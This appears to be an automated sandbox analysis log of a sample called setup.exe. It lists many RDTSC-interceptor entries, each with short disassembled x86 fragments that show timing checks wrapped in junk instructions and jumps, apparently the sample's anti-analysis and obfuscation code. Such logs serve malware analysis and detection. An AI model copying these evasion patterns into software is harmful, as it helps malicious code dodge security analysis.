Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 59FF96 second address: 59FFAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F808D4B80BCh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 59FFAC second address: 59FFB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5A7718 second address: 5A7734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F808D4B80BFh 0x0000000e pop ecx 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5A9A60 second address: 5A9A68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5A9A68 second address: 5A9A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 536B65 second address: 536B6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5ACCE0 second address: 5ACCFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5ACCFC second address: 5ACD1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F808D280526h 0x00000009 jmp 00007F808D280531h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5ACFD9 second address: 5ACFDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5ACFDD second address: 5ACFED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D28052Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5B2518 second address: 5B251E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5B251E second address: 5B2548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F808D28052Ch 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 jmp 00007F808D280530h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5B2548 second address: 5B2575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D4B80C4h 0x00000009 popad 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e jbe 00007F808D4B80BCh 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5B2575 second address: 5B2579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5B2579 second address: 5B2592 instructions: 0x00000000 rdtsc 0x00000002 js 00007F808D4B80B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007F808D4B80B8h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5B2592 second address: 5B2598 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5B2598 second address: 5B259C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5B759D second address: 5B75A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5B75A1 second address: 5B75A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5B61CE second address: 5B61D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5B67D7 second address: 5B6806 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80BAh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push esi 0x00000011 pop esi 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 jmp 00007F808D4B80C1h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5B6984 second address: 5B6988 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5B6988 second address: 5B69A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F808D4B80B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jns 00007F808D4B80BEh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5B69A2 second address: 5B69A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5B69A8 second address: 5B69D3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F808D4B80B6h 0x00000008 jmp 00007F808D4B80C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 je 00007F808D4B80B6h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5B6C82 second address: 5B6C88 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5B6C88 second address: 5B6CB5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F808D4B80BBh 0x00000008 je 00007F808D4B80B6h 0x0000000e pop edx 0x0000000f jp 00007F808D4B80C2h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5B6CB5 second address: 5B6CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D280534h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5B6CCF second address: 5B6CE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F808D4B80BFh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5B6E61 second address: 5B6E75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D28052Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5B6E75 second address: 5B6E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5B6E79 second address: 5B6E7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5B6E7D second address: 5B6EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F808D4B80C4h 0x00000011 jbe 00007F808D4B80BCh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5B6EA9 second address: 5B6EB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5B6EB1 second address: 5B6EB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5B72A4 second address: 5B72A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 530039 second address: 530089 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007F808D4B80B6h 0x0000000b jmp 00007F808D4B80C2h 0x00000010 popad 0x00000011 jnl 00007F808D4B80C5h 0x00000017 pop edx 0x00000018 pop eax 0x00000019 js 00007F808D4B80F1h 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F808D4B80C3h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 530089 second address: 5300A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D280534h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5300A4 second address: 5300AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5BBD16 second address: 5BBD5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D28052Fh 0x00000009 popad 0x0000000a push esi 0x0000000b push edx 0x0000000c pop edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop esi 0x00000010 jmp 00007F808D280538h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F808D280533h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5BBD5D second address: 5BBD61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5BC34C second address: 5BC352 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5BC352 second address: 5BC365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D4B80BFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5BC365 second address: 5BC369 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5BC369 second address: 5BC373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5BC373 second address: 5BC3AB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F808D280526h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jbe 00007F808D280526h 0x00000017 jmp 00007F808D280532h 0x0000001c popad 0x0000001d jns 00007F808D28052Eh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5BC3AB second address: 5BC3B5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F808D4B80C8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5BBA5D second address: 5BBA6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F808D280526h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5BBA6C second address: 5BBA70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5BBA70 second address: 5BBA8A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F808D280526h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F808D280526h 0x00000014 jg 00007F808D280526h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5BC992 second address: 5BC996 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5BCAD8 second address: 5BCAE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D28052Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5BCAE7 second address: 5BCAFD instructions: 0x00000000 rdtsc 0x00000002 jns 00007F808D4B80B6h 0x00000008 jnp 00007F808D4B80B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5BCAFD second address: 5BCB01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5BCE03 second address: 5BCE13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jl 00007F808D4B80B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5C1490 second address: 5C1496 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5C1496 second address: 5C14BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F808D4B80C8h 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5C70AA second address: 5C70BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F808D28052Ch 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5C70BA second address: 5C70C4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F808D4B80C2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5C70C4 second address: 5C70CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5C70CA second address: 5C70F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 jmp 00007F808D4B80C8h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop ecx 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5C5C7F second address: 5C5CAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F808D280533h 0x00000011 push eax 0x00000012 push edx 0x00000013 ja 00007F808D280526h 0x00000019 jnp 00007F808D280526h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5C5CAC second address: 5C5CB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5C5CB2 second address: 5C5CB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5C5CB8 second address: 5C5CCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D4B80C1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5C5CCD second address: 5C5CD7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F808D280526h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5C669C second address: 5C66AC instructions: 0x00000000 rdtsc 0x00000002 jns 00007F808D4B80B6h 0x00000008 js 00007F808D4B80B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5C6AF6 second address: 5C6AFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53863B second address: 53863F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53863F second address: 538643 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 538643 second address: 53864B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53864B second address: 538650 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 538650 second address: 538682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push edx 0x00000008 jmp 00007F808D4B80BDh 0x0000000d pop edx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F808D4B80C6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 538682 second address: 5386A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jns 00007F808D280526h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F808D280534h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5386A2 second address: 5386A7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5CA281 second address: 5CA287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5CA287 second address: 5CA29B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jo 00007F808D4B80B6h 0x0000000c ja 00007F808D4B80B6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5CD8B2 second address: 5CD8B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5CD8B7 second address: 5CD8D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F808D4B80B6h 0x0000000a jmp 00007F808D4B80C6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57EA65 second address: 57EA6B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57EA6B second address: 563308 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007F808D4B80BAh 0x00000011 call dword ptr [ebp+122DB56Eh] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57EF09 second address: 57EF0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57F02C second address: 57F057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D4B80C1h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F808D4B80C2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57F057 second address: 57F062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push ebx 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57F062 second address: 3CE8A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 nop 0x00000007 jmp 00007F808D4B80C5h 0x0000000c push dword ptr [ebp+122D1401h] 0x00000012 mov dx, si 0x00000015 call dword ptr [ebp+122D1850h] 0x0000001b pushad 0x0000001c mov dword ptr [ebp+122D1BC4h], ecx 0x00000022 xor eax, eax 0x00000024 sub dword ptr [ebp+122D2790h], edx 0x0000002a mov edx, dword ptr [esp+28h] 0x0000002e add dword ptr [ebp+122D1BC4h], eax 0x00000034 pushad 0x00000035 mov edx, 607D7F57h 0x0000003a mov dword ptr [ebp+122D193Bh], edi 0x00000040 popad 0x00000041 mov dword ptr [ebp+122D2A3Fh], eax 0x00000047 jmp 00007F808D4B80BBh 0x0000004c mov esi, 0000003Ch 0x00000051 sub dword ptr [ebp+122D1C5Ch], eax 0x00000057 add esi, dword ptr [esp+24h] 0x0000005b mov dword ptr [ebp+122D2790h], ecx 0x00000061 jno 00007F808D4B80B7h 0x00000067 lodsw 0x00000069 pushad 0x0000006a pushad 0x0000006b xor ebx, dword ptr [ebp+122D2AFFh] 0x00000071 add edx, 763E7B1Eh 0x00000077 popad 0x00000078 xor dword ptr [ebp+122D1C5Ch], ecx 0x0000007e popad 0x0000007f add eax, dword ptr [esp+24h] 0x00000083 jmp 00007F808D4B80BFh 0x00000088 or dword ptr [ebp+122D2790h], eax 0x0000008e mov ebx, dword ptr [esp+24h] 0x00000092 pushad 0x00000093 ja 00007F808D4B80BCh 0x00000099 popad 0x0000009a push eax 0x0000009b jo 00007F808D4B80C8h 0x000000a1 push eax 0x000000a2 push edx 0x000000a3 jng 00007F808D4B80B6h 0x000000a9 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57F135 second address: 57F13B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57F13B second address: 57F13F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57F13F second address: 57F166 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F808D280526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 22CB68FAh 0x00000013 mov edi, dword ptr [ebp+122D2893h] 0x00000019 call 00007F808D280529h 0x0000001e push edi 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57F166 second address: 57F177 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F808D4B80B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57F177 second address: 57F18C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e jnl 00007F808D280526h 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57F18C second address: 57F191 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
